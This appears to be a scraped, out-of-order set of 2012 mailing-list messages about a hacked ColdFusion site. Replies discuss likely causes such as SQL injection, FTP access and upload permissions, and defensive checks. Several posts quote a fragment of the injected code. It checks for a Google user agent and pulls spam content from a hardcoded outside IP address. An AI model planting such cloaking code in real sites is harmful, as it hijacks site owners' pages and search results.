> ...lax server security. We've got a boatload of stuff on this site
> to prevernt SQL injection, including Justin D. Scott's application
> script, carefully checking anything to goes into the database, ...
I haven't looked at the rest of the thread yet, but I would note that
the script I wrote i
> Everything is "paramed" to the hilt - I sanitize all form vars BEFORE
> the query, and then use cfqueryparam on top of that ... so I'm guess
> we're looking at a ftp vulnerability.
What about URL, CGI and Cookie scopes? All of those can cause the same problems.
> Question though - how could an
> I think it sounds like one developer was trying to destroy your search
> ranking by giving googlebot to an obvious spam page. (don't they know
> about robots.txt?) Too bad for you guys, google now makes a web browser,
> and thus your problem. No standard exploit will inject CFML into a page
> u
firstly you should try to determine when the hack was done.
check the last modified date of the file in question (unless you have
already edited it since).
Then ask your host to check the FTP logs for that date and see if anyone
accessed that file on that date, this will rule out FTP as the cause.
Just to put the record straight it is entirely possible to create files
using SQL scripts if permissions allow it.
That SQL Injection was possible was demonstrated to Allaire by putting a
file in the C:\ directory of their main production website using SQL
Injection... :-)
On 14/11/2012 8:47
I've seen something like this on a shared server that was running
osCommerce. The uploads directory had the wrong permissions set, the
attacker uploaded a server admin script that could set permissions on other
directories. They were then able to inject code into every index.php,
index.html, index
>Recently a site of ours got hacked - basically, a Google search the site
>was returning viagra info!
>What we got was a small script added to the end of a functions.cfm file:
>
>"google", REQUEST.UserAgent )) >
>url="http://168.16.228.250/fms/";>#cfhttp.filecontent#
>
>I'm not the server admin f
I think it sounds like one developer was trying to destroy your search
ranking by giving googlebot to an obvious spam page. (don't they know
about robots.txt?) Too bad for you guys, google now makes a web browser,
and thus your problem. No standard exploit will inject CFML into a page
unless you'
It doesn't have to have queries on it. Does it output data?
That said, it sounds like some other sort of exploit.
On Tue, Nov 13, 2012 at 3:30 PM, Les Mizzell wrote:
>
> > Issues like this are typically caused by either SQL injection (i.e.
> didn't use cfqueryparam) or
> > some sort of FTP
> Issues like this are typically caused by either SQL injection (i.e.
didn't use cfqueryparam) or
> some sort of FTP vulnerability. My first step would be to make sure
that *every*
> cfquery that accepts any input of any kind from users is utilizing
cfqueryparam.
Everything is "paramed" to
LOL. Wow. That's a very funny script! Not funny that it happened to you, of
course, but that's just awesome.
Issues like this are typically caused by either SQL injection (i.e. didn't
use cfqueryparam) or some sort of FTP vulnerability. My first step would be
to make sure that *every* cfquery tha
Recently a site of ours got hacked - basically, a Google search the site
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:
http://168.16.228.250/fms/";>#cfhttp.filecontent#
I'm not the server admin for this site, so they're sorta pointing the
12 matches
Mail list logo